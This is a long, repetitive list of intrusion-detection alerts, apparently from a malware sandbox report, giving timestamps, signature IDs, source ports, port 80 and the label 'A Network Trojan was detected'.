            Timestamp:05/29/24-15:42:12.652341
            SID:2024312
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:09.285920
            SID:2024318
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:12.652341
            SID:2024317
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:09.282527
            SID:2021641
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:11.942922
            SID:2025381
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:55.212846
            SID:2024318
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:07.455148
            SID:2021641
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:09.285920
            SID:2024313
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:53.150602
            SID:2025381
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:39.931883
            SID:2024318
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:26.177150
            SID:2024313
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:39.353995
            SID:2024318
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:39.353995
            SID:2024313
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:42.013116
            SID:2025381
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:52.300724
            SID:2021641
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:37.356647
            SID:2021641
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:15.181530
            SID:2025381
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:34.630779
            SID:2024318
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:34.630779
            SID:2024313
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:55.765644
            SID:2025381
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:37.356647
            SID:2025381
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:17.880992
            SID:2025381
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:36.746086
            SID:2024318
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:20.705538
            SID:2021641
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:36.746086
            SID:2024313
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:42.784784
            SID:2021641
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:53.150602
            SID:2021641
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:10.038270
            SID:2021641
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:15.295734
            SID:2024313
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:38.811867
            SID:2025381
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:59.101278
            SID:2024318
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:03.719373
            SID:2025381
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:28.740548
            SID:2021641
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:15.295734
            SID:2024318
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:09.285920
            SID:2025381
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:50.755707
            SID:2021641
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:28.962608
            SID:2021641
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:01.201418
            SID:2021641
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:58.470593
            SID:2021641
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:47.749478
            SID:2025381
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:03.791896
            SID:2025381
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:44.907872
            SID:2024318
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:46.833672
            SID:2024318
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:44.907872
            SID:2024313
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:59.101278
            SID:2024313
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:31.801523
            SID:2024318
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:28.419439
            SID:2021641
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:46.833672
            SID:2024313
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:31.801523
            SID:2024313
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:01.102766
            SID:2024313
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:45.418561
            SID:2021641
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:17.361906
            SID:2021641
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:22.752549
            SID:2025381
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:01.102766
            SID:2024318
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:14.760597
            SID:2021641
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:31.346168
            SID:2021641
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:20.226591
            SID:2024318
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:07.397794
            SID:2031412
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:12.009845
            SID:2024318
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:33.942473
            SID:2024313
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:12.009845
            SID:2024313
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:33.942473
            SID:2024318
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:10.058300
            SID:2021641
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:52.300724
            SID:2025381
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:58.198557
            SID:2024318
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:27.019236
            SID:2031412
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:36.155572
            SID:2025381
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:06.434631
            SID:2024313
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:58.198557
            SID:2024313
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:47.538291
            SID:2021641
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:06.434631
            SID:2024318
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:20.226591
            SID:2024313
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:33.478550
            SID:2021641
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:20.544811
            SID:2025381
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:49.526860
            SID:2021641
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:41.960861
            SID:2025381
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:11.942922
            SID:2021641
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:04.642667
            SID:2025381
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:58.351209
            SID:2025381
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:33.985205
            SID:2025381
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:30.851082
            SID:2031412
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:41.466952
            SID:2021641
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:31.132505
            SID:2025381
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:39.311748
            SID:2025381
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:06.533178
            SID:2024313
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:50.468524
            SID:2024318
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:25.482920
            SID:2024318
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:25.723486
            SID:2025381
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:26.168825
            SID:2024313
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:06.533178
            SID:2024318
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:50.468524
            SID:2024313
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:09.282527
            SID:2024318
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:25.482920
            SID:2024313
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:07.455148
            SID:2024313
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:09.282527
            SID:2024313
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:55.680526
            SID:2021641
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:39.353995
            SID:2021641
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:14.729917
            SID:2025381
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:22.948804
            SID:2021641
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:28.214472
            SID:2025381
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:36.658231
            SID:2021641
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:26.168825
            SID:2024318
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:44.149214
            SID:2025381
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:42.784784
            SID:2024318
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:31.346168
            SID:2025381
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:06.437304
            SID:2024318
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:06.437304
            SID:2024313
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:34.630779
            SID:2021641
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:17.361906
            SID:2025381
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:42.784784
            SID:2024313
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:45.418561
            SID:2025381
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:15.295734
            SID:2021641
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:47.749478
            SID:2021641
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:53.150602
            SID:2024318
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:28.740548
            SID:2024313
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:04.642667
            SID:2024313
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:53.150602
            SID:2024313
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:01.201418
            SID:2024318
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:50.755707
            SID:2024313
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:09.282527
            SID:2025381
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:28.740548
            SID:2024318
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:55.212846
            SID:2025381
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:01.201418
            SID:2024313
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:50.755707
            SID:2024318
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:07.455148
            SID:2025381
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:03.719373
            SID:2021641
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:33.478550
            SID:2025381
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:17.857076
            SID:2024313
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:33.985205
            SID:2021641
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:17.418907
            SID:2024313
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:30.801731
            SID:2024313
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:17.418907
            SID:2024318
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:20.705538
            SID:2025381
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:04.642667
            SID:2024318
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:17.857076
            SID:2024318
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:30.801731
            SID:2024318
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:10.038270
            SID:2025381
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:50.288079
            SID:2025381
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:47.538291
            SID:2024318
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:52.927476
            SID:2025381
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:20.226591
            SID:2025381
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:28.419439
            SID:2024313
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:53.430975
            SID:2025381
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:28.419439
            SID:2024318
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:44.149214
            SID:2021641
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:15.181530
            SID:2021641
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:03.852643
            SID:2025381
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:00.934566
            SID:2025381
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:01.734415
            SID:2021641
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:42.013116
            SID:2024313
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:33.942473
            SID:2021641
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:14.760597
            SID:2025381
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:10.058300
            SID:2024313
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:55.765644
            SID:2024313
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:58.198557
            SID:2021641
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:42.013116
            SID:2024318
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:47.538291
            SID:2024313
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:20.008059
            SID:2021641
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:28.962608
            SID:2025381
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:26.177150
            SID:2025381
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:55.765644
            SID:2024318
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:46.507602
            SID:2031412
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:48.086059
            SID:2024318
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:50.249805
            SID:2031412
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:03.791896
            SID:2021641
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:38.811867
            SID:2024313
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:48.086059
            SID:2024313
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:11.942922
            SID:2024318
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:12.652341
            SID:2025381
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:39.931883
            SID:2025381
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:06.533178
            SID:2021641
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:38.811867
            SID:2024318
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:31.801523
            SID:2025381
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:41.466952
            SID:2025381
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:56.184812
            SID:2024318
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:09.224417
            SID:2025381
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:25.482920
            SID:2021641
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:56.184812
            SID:2024313
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:50.468524
            SID:2021641
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:55.680526
            SID:2024313
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:48.471145
            SID:2031412
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:01.734415
            SID:2025381
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:22.948804
            SID:2024313
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:22.948804
            SID:2024318
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:36.658231
            SID:2024313
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:36.658231
            SID:2024318
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:23.375856
            SID:2021641
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:10.058300
            SID:2024318
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:55.680526
            SID:2024318
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:36.155572
            SID:2021641
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:14.729917
            SID:2024318
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:22.752549
            SID:2024313
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:52.927476
            SID:2021641
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:06.437304
            SID:2021641
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:33.942473
            SID:2025381
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:01.102766
            SID:2025381
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:39.353995
            SID:2025381
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:22.752549
            SID:2024318
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:31.132505
            SID:2024318
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:47.749478
            SID:2024318
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
